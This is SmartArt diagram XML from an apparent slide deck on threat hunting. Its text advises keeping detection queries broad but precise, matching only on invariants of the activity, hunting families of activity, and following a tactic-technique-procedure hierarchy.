    <dgm:cxn modelId="{C40E7D5E-00AB-4992-8D68-95CDF58343C2}" srcId="{C28A6D4A-BC81-44E4-B510-DB1EDB3068F6}" destId="{6D9A70AA-D91D-4128-B8B0-4398C1BA7D2E}" srcOrd="0" destOrd="0" parTransId="{08DBAC6C-6253-400E-B894-1DABDF0304BE}" sibTransId="{82103D19-A198-4476-B58C-A22447FC96EE}"/>
    <dgm:cxn modelId="{D8885D47-76C0-4BD7-8C83-BD6398BEA5D2}" type="presOf" srcId="{82103D19-A198-4476-B58C-A22447FC96EE}" destId="{A71CA81B-E68C-40B7-AC75-239C00F18A23}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{D423B84C-DB35-4CE7-A83D-44E5E2E06F1F}" type="presOf" srcId="{0A35D1AC-0AD7-4B3A-B4DF-EF12E3F73769}" destId="{9BDFE564-DEB1-4B9F-8E53-3DD727AF27A7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{0C5A1A71-F33C-4D80-980E-2371BB975DC0}" type="presOf" srcId="{0A35D1AC-0AD7-4B3A-B4DF-EF12E3F73769}" destId="{B2C80EDE-1ED2-4BED-9037-48F82A109386}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{F6674155-39DF-4865-8D89-78B943AF8F31}" type="presOf" srcId="{C177B2B0-15A6-491F-8212-388FBB1625F8}" destId="{035B2DE9-2942-4312-BEDB-C30DCA13FEF3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{3CF23457-8EB7-486E-97AB-B8C588CA81D3}" type="presOf" srcId="{6D9A70AA-D91D-4128-B8B0-4398C1BA7D2E}" destId="{7F941101-FEBD-4370-8B0B-F1FE04BF945E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{119BB084-9CD9-4A0D-89BF-B24489F170B3}" srcId="{C28A6D4A-BC81-44E4-B510-DB1EDB3068F6}" destId="{C17443C3-CE41-4313-9AEB-78958FB20851}" srcOrd="2" destOrd="0" parTransId="{9D740830-6B21-43A9-8AFC-4FCECD979366}" sibTransId="{0A35D1AC-0AD7-4B3A-B4DF-EF12E3F73769}"/>
    <dgm:cxn modelId="{B32FC28D-B515-40FF-BEE6-E51EC125B885}" type="presOf" srcId="{DA398265-252F-4010-AF98-8F87DAC60600}" destId="{80CF6733-AB7E-4659-B4FD-1C77A36087CE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{74E68CB0-DE2B-4D3B-8F58-3734F57D40A7}" type="presOf" srcId="{C17443C3-CE41-4313-9AEB-78958FB20851}" destId="{6DDB5530-8C47-43A1-B2AD-3322D5804479}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{28C7E0B4-C483-4EFB-911E-2174AC982053}" type="presOf" srcId="{15152B02-B62C-4EDA-870D-8C3E19A2E867}" destId="{70B4470F-ACEC-4C5E-AA80-81A8B8E116C1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{7ECD3FEE-9382-409A-A8DC-27198D0AF909}" type="presOf" srcId="{C28A6D4A-BC81-44E4-B510-DB1EDB3068F6}" destId="{659AA652-0DD4-4B07-9DDB-C3E1E976EE42}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{B8E925F2-F95E-4A6B-848D-5D9F0F607BF0}" type="presOf" srcId="{C177B2B0-15A6-491F-8212-388FBB1625F8}" destId="{937B36A4-9B58-4FA0-8827-1EBB1DE4C60A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{D834CBEE-8343-4D2C-9F54-B0A5030BCF04}" type="presParOf" srcId="{659AA652-0DD4-4B07-9DDB-C3E1E976EE42}" destId="{7F941101-FEBD-4370-8B0B-F1FE04BF945E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{B9CBC0F7-A150-45E4-8D73-8CE5A1D3B6BB}" type="presParOf" srcId="{659AA652-0DD4-4B07-9DDB-C3E1E976EE42}" destId="{C56191A7-CEB1-4B79-84E0-C777FE9C6DD1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{8D7CF888-B3C6-48F4-9D90-0AD87C7B25AE}" type="presParOf" srcId="{C56191A7-CEB1-4B79-84E0-C777FE9C6DD1}" destId="{A71CA81B-E68C-40B7-AC75-239C00F18A23}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{31F7C3B5-B151-429D-8AC7-04F6252D083F}" type="presParOf" srcId="{659AA652-0DD4-4B07-9DDB-C3E1E976EE42}" destId="{70B4470F-ACEC-4C5E-AA80-81A8B8E116C1}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{4031AD5F-0EC4-49AD-A358-B7D6712011B9}" type="presParOf" srcId="{659AA652-0DD4-4B07-9DDB-C3E1E976EE42}" destId="{937B36A4-9B58-4FA0-8827-1EBB1DE4C60A}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{34562524-7766-4C55-A8A8-208EC3CD2130}" type="presParOf" srcId="{937B36A4-9B58-4FA0-8827-1EBB1DE4C60A}" destId="{035B2DE9-2942-4312-BEDB-C30DCA13FEF3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{392FC14A-DB0C-43EC-B67B-28C8EC9E5A94}" type="presParOf" srcId="{659AA652-0DD4-4B07-9DDB-C3E1E976EE42}" destId="{6DDB5530-8C47-43A1-B2AD-3322D5804479}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{494A24B8-9292-49D1-A2D5-3A6F17B4C9E6}" type="presParOf" srcId="{659AA652-0DD4-4B07-9DDB-C3E1E976EE42}" destId="{9BDFE564-DEB1-4B9F-8E53-3DD727AF27A7}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{B1042213-6500-4054-A20E-23E488F8E5AB}" type="presParOf" srcId="{9BDFE564-DEB1-4B9F-8E53-3DD727AF27A7}" destId="{B2C80EDE-1ED2-4BED-9037-48F82A109386}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{A5226AB2-40FF-488A-8956-1D461409CDF5}" type="presParOf" srcId="{659AA652-0DD4-4B07-9DDB-C3E1E976EE42}" destId="{80CF6733-AB7E-4659-B4FD-1C77A36087CE}"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B76FCB-CF47-4899-A22B-E24F538F5215}"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9E691AEE-4FCE-49CB-BA6C-57D470E2FED1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU" dirty="0"/>
            <a:t>Our queries should be as broad as possible, whilst staying </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" i="1" dirty="0"/>
            <a:t>precise</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A35500D2-12CF-4525-AE45-89CE52D5DBE4}" type="parTrans" cxnId="{F8E333AF-3033-48E6-ACC0-2B3AE7099087}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{540E1A95-8349-4336-8E93-DEBBDE1DD1C9}" type="sibTrans" cxnId="{F8E333AF-3033-48E6-ACC0-2B3AE7099087}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{912BD8B4-5B47-4954-91E2-BA8F7C83BC81}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU" dirty="0"/>
            <a:t>Ideally we get both, if we have elements with strong </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" i="1" dirty="0"/>
            <a:t>uniqueness</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" dirty="0"/>
            <a:t> in our query</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{13C58180-A494-4F6A-BF7A-D681780F0724}" type="parTrans" cxnId="{350D1F72-5635-4F28-B353-468A329816BD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D4159BCD-460B-4DBF-9462-99F36F64F0E8}" type="sibTrans" cxnId="{350D1F72-5635-4F28-B353-468A329816BD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87DCC3F0-D725-4CC8-B0CF-8A8B085262BF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU" dirty="0"/>
            <a:t>Never risk missing anything by requiring a match for something that is not an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" i="1" dirty="0"/>
            <a:t>invariant</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" dirty="0"/>
            <a:t> for the activity of concern</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C04D991D-4288-46AF-9AFB-F87C28E7EF11}" type="parTrans" cxnId="{8D75A90E-DEF5-427D-8DE0-69A0C5649562}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA1D6F93-B8DA-45A0-BF10-C80F5BFA74F7}" type="sibTrans" cxnId="{8D75A90E-DEF5-427D-8DE0-69A0C5649562}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{11986E15-6516-434B-96B7-D2F27C927213}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU" dirty="0"/>
            <a:t>No matter how much it is a unique signal of malicious activity!</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C1FD372F-CF5B-4EDD-ABD2-FBBD3EF6BA71}" type="parTrans" cxnId="{7168BB37-F9DD-4377-A4A3-A107CCE27DB5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B7EA572D-3982-4932-A047-2E7E6B9D327C}" type="sibTrans" cxnId="{7168BB37-F9DD-4377-A4A3-A107CCE27DB5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EEEEFDDA-74E4-4651-9D65-7D487C38F645}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU" dirty="0"/>
            <a:t>Ultimately, we want to make sure we don’t hunt for individual bits of activity, but the families of activity that the evidence is an example of, wherever possible</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DD4A71F5-66AA-411E-B339-C8F079279CE3}" type="parTrans" cxnId="{362329C5-C375-4AE6-AE8C-681BCC93A05B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AECC4C1F-84CA-412A-9751-9415F1A84B1C}" type="sibTrans" cxnId="{362329C5-C375-4AE6-AE8C-681BCC93A05B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CAE74940-62B9-4051-9038-062FB76AA792}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU" sz="1800" dirty="0"/>
            <a:t>But it can get hard</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9D230290-0AEB-49ED-8F97-3F2D9A0139FC}" type="parTrans" cxnId="{CC989EC3-3D10-4324-8D48-3FC2D3A41377}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{331C1A95-12DF-41BC-A9F9-0C961FD6A03E}" type="sibTrans" cxnId="{CC989EC3-3D10-4324-8D48-3FC2D3A41377}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{99A6F339-E3B5-4097-B3AC-7FCD2615F351}" type="pres">
      <dgm:prSet presAssocID="{00B76FCB-CF47-4899-A22B-E24F538F5215}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F5AB347C-C65D-4260-AE3B-4ECA7CBB9013}" type="pres">
      <dgm:prSet presAssocID="{9E691AEE-4FCE-49CB-BA6C-57D470E2FED1}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8BA12BA2-D08A-49F6-A34A-DA26DC4B1049}" type="pres">
      <dgm:prSet presAssocID="{9E691AEE-4FCE-49CB-BA6C-57D470E2FED1}" presName="parTx" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{558F2750-E977-4073-AFF2-5A0D7242ADEF}" type="pres">
      <dgm:prSet presAssocID="{9E691AEE-4FCE-49CB-BA6C-57D470E2FED1}" presName="desTx" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9C978DC6-EFD4-4294-8905-2D23F73BDF1D}" type="pres">
      <dgm:prSet presAssocID="{540E1A95-8349-4336-8E93-DEBBDE1DD1C9}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{59BE293A-9C83-4F24-9C9E-DE1D81D2D7D7}" type="pres">
      <dgm:prSet presAssocID="{87DCC3F0-D725-4CC8-B0CF-8A8B085262BF}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B93F8D26-7DEE-4EFE-864D-4E7AF901A793}" type="pres">
      <dgm:prSet presAssocID="{87DCC3F0-D725-4CC8-B0CF-8A8B085262BF}" presName="parTx" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{719046D4-7760-4250-9BB1-D00A04A1540D}" type="pres">
      <dgm:prSet presAssocID="{87DCC3F0-D725-4CC8-B0CF-8A8B085262BF}" presName="desTx" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B7AB2BC7-7614-4215-AC44-13D5993CC10A}" type="pres">
      <dgm:prSet presAssocID="{CA1D6F93-B8DA-45A0-BF10-C80F5BFA74F7}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{761AB4E0-853B-4186-95F5-D7655C5C80FB}" type="pres">
      <dgm:prSet presAssocID="{EEEEFDDA-74E4-4651-9D65-7D487C38F645}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A91E23FD-CD1F-414C-A62B-85E9A2618ED1}" type="pres">
      <dgm:prSet presAssocID="{EEEEFDDA-74E4-4651-9D65-7D487C38F645}" presName="parTx" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{16EC0451-074C-436C-AFD6-6F0CFF900993}" type="pres">
      <dgm:prSet presAssocID="{EEEEFDDA-74E4-4651-9D65-7D487C38F645}" presName="desTx" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{8D75A90E-DEF5-427D-8DE0-69A0C5649562}" srcId="{00B76FCB-CF47-4899-A22B-E24F538F5215}" destId="{87DCC3F0-D725-4CC8-B0CF-8A8B085262BF}" srcOrd="1" destOrd="0" parTransId="{C04D991D-4288-46AF-9AFB-F87C28E7EF11}" sibTransId="{CA1D6F93-B8DA-45A0-BF10-C80F5BFA74F7}"/>
    <dgm:cxn modelId="{A8B3C036-749D-4F41-9D57-CF54DB446F13}" type="presOf" srcId="{00B76FCB-CF47-4899-A22B-E24F538F5215}" destId="{99A6F339-E3B5-4097-B3AC-7FCD2615F351}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{7168BB37-F9DD-4377-A4A3-A107CCE27DB5}" srcId="{87DCC3F0-D725-4CC8-B0CF-8A8B085262BF}" destId="{11986E15-6516-434B-96B7-D2F27C927213}" srcOrd="0" destOrd="0" parTransId="{C1FD372F-CF5B-4EDD-ABD2-FBBD3EF6BA71}" sibTransId="{B7EA572D-3982-4932-A047-2E7E6B9D327C}"/>
    <dgm:cxn modelId="{13B8EC6C-3FEF-427F-B6B6-8449E5836D0B}" type="presOf" srcId="{9E691AEE-4FCE-49CB-BA6C-57D470E2FED1}" destId="{8BA12BA2-D08A-49F6-A34A-DA26DC4B1049}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{350D1F72-5635-4F28-B353-468A329816BD}" srcId="{9E691AEE-4FCE-49CB-BA6C-57D470E2FED1}" destId="{912BD8B4-5B47-4954-91E2-BA8F7C83BC81}" srcOrd="0" destOrd="0" parTransId="{13C58180-A494-4F6A-BF7A-D681780F0724}" sibTransId="{D4159BCD-460B-4DBF-9462-99F36F64F0E8}"/>
    <dgm:cxn modelId="{07745556-B0C3-48C8-8B61-AE97A472CB40}" type="presOf" srcId="{CAE74940-62B9-4051-9038-062FB76AA792}" destId="{16EC0451-074C-436C-AFD6-6F0CFF900993}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{56172CA5-55B0-4BBD-B19C-E8B25219D3D2}" type="presOf" srcId="{912BD8B4-5B47-4954-91E2-BA8F7C83BC81}" destId="{558F2750-E977-4073-AFF2-5A0D7242ADEF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{F8E333AF-3033-48E6-ACC0-2B3AE7099087}" srcId="{00B76FCB-CF47-4899-A22B-E24F538F5215}" destId="{9E691AEE-4FCE-49CB-BA6C-57D470E2FED1}" srcOrd="0" destOrd="0" parTransId="{A35500D2-12CF-4525-AE45-89CE52D5DBE4}" sibTransId="{540E1A95-8349-4336-8E93-DEBBDE1DD1C9}"/>
    <dgm:cxn modelId="{7A9836B0-638B-40C0-BC09-749E3A9DB45B}" type="presOf" srcId="{EEEEFDDA-74E4-4651-9D65-7D487C38F645}" destId="{A91E23FD-CD1F-414C-A62B-85E9A2618ED1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{F28B80BC-834A-4718-9864-F36E511FB202}" type="presOf" srcId="{11986E15-6516-434B-96B7-D2F27C927213}" destId="{719046D4-7760-4250-9BB1-D00A04A1540D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{CC989EC3-3D10-4324-8D48-3FC2D3A41377}" srcId="{EEEEFDDA-74E4-4651-9D65-7D487C38F645}" destId="{CAE74940-62B9-4051-9038-062FB76AA792}" srcOrd="0" destOrd="0" parTransId="{9D230290-0AEB-49ED-8F97-3F2D9A0139FC}" sibTransId="{331C1A95-12DF-41BC-A9F9-0C961FD6A03E}"/>
    <dgm:cxn modelId="{362329C5-C375-4AE6-AE8C-681BCC93A05B}" srcId="{00B76FCB-CF47-4899-A22B-E24F538F5215}" destId="{EEEEFDDA-74E4-4651-9D65-7D487C38F645}" srcOrd="2" destOrd="0" parTransId="{DD4A71F5-66AA-411E-B339-C8F079279CE3}" sibTransId="{AECC4C1F-84CA-412A-9751-9415F1A84B1C}"/>
    <dgm:cxn modelId="{324946CD-7832-49D2-83AA-8A32D4AD7B7C}" type="presOf" srcId="{87DCC3F0-D725-4CC8-B0CF-8A8B085262BF}" destId="{B93F8D26-7DEE-4EFE-864D-4E7AF901A793}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{5498C29E-1CA0-4311-853A-B8796954FA76}" type="presParOf" srcId="{99A6F339-E3B5-4097-B3AC-7FCD2615F351}" destId="{F5AB347C-C65D-4260-AE3B-4ECA7CBB9013}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{288A4278-5206-4046-8805-DD42B069D205}" type="presParOf" srcId="{F5AB347C-C65D-4260-AE3B-4ECA7CBB9013}" destId="{8BA12BA2-D08A-49F6-A34A-DA26DC4B1049}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{C7BDE375-CEAF-469E-9008-3EEB72355F78}" type="presParOf" srcId="{F5AB347C-C65D-4260-AE3B-4ECA7CBB9013}" destId="{558F2750-E977-4073-AFF2-5A0D7242ADEF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{199A2769-A5CE-4757-8A42-98F734BBC0D4}" type="presParOf" srcId="{99A6F339-E3B5-4097-B3AC-7FCD2615F351}" destId="{9C978DC6-EFD4-4294-8905-2D23F73BDF1D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{4FD5CB98-F8D2-42BD-9795-B07E081938F1}" type="presParOf" srcId="{99A6F339-E3B5-4097-B3AC-7FCD2615F351}" destId="{59BE293A-9C83-4F24-9C9E-DE1D81D2D7D7}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{60ED21CF-24AF-44BE-8381-97E4FEB97DA6}" type="presParOf" srcId="{59BE293A-9C83-4F24-9C9E-DE1D81D2D7D7}" destId="{B93F8D26-7DEE-4EFE-864D-4E7AF901A793}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{51AAA922-C93D-4D77-ABED-0B7184888714}" type="presParOf" srcId="{59BE293A-9C83-4F24-9C9E-DE1D81D2D7D7}" destId="{719046D4-7760-4250-9BB1-D00A04A1540D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{DEE2CD73-AF89-4711-90F1-CDD76333D9D8}" type="presParOf" srcId="{99A6F339-E3B5-4097-B3AC-7FCD2615F351}" destId="{B7AB2BC7-7614-4215-AC44-13D5993CC10A}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{E5555394-4DC7-483D-9D78-A52BBA920B07}" type="presParOf" srcId="{99A6F339-E3B5-4097-B3AC-7FCD2615F351}" destId="{761AB4E0-853B-4186-95F5-D7655C5C80FB}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{D2ADA62D-76F0-4425-8535-A0119FA70291}" type="presParOf" srcId="{761AB4E0-853B-4186-95F5-D7655C5C80FB}" destId="{A91E23FD-CD1F-414C-A62B-85E9A2618ED1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{190A0394-F226-4B79-8E09-B8773D8872BD}" type="presParOf" srcId="{761AB4E0-853B-4186-95F5-D7655C5C80FB}" destId="{16EC0451-074C-436C-AFD6-6F0CFF90099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260CEE-527A-4EC3-97A8-1043F80F9238}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vList2" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple4" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/colorful4" csCatId="colorful"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{36E21C37-57B1-4802-98BA-B7461655ECBC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU" dirty="0"/>
            <a:t>Tactic -&gt; Technique -&gt; (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" dirty="0" err="1"/>
            <a:t>Subtechnique</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" dirty="0"/>
            <a:t>) -&gt; Procedure</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{222ED456-CC8F-4AFC-9FE7-136F994665E4}" type="parTrans" cxnId="{B884407A-32AC-43D3-A623-DC185652A961}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
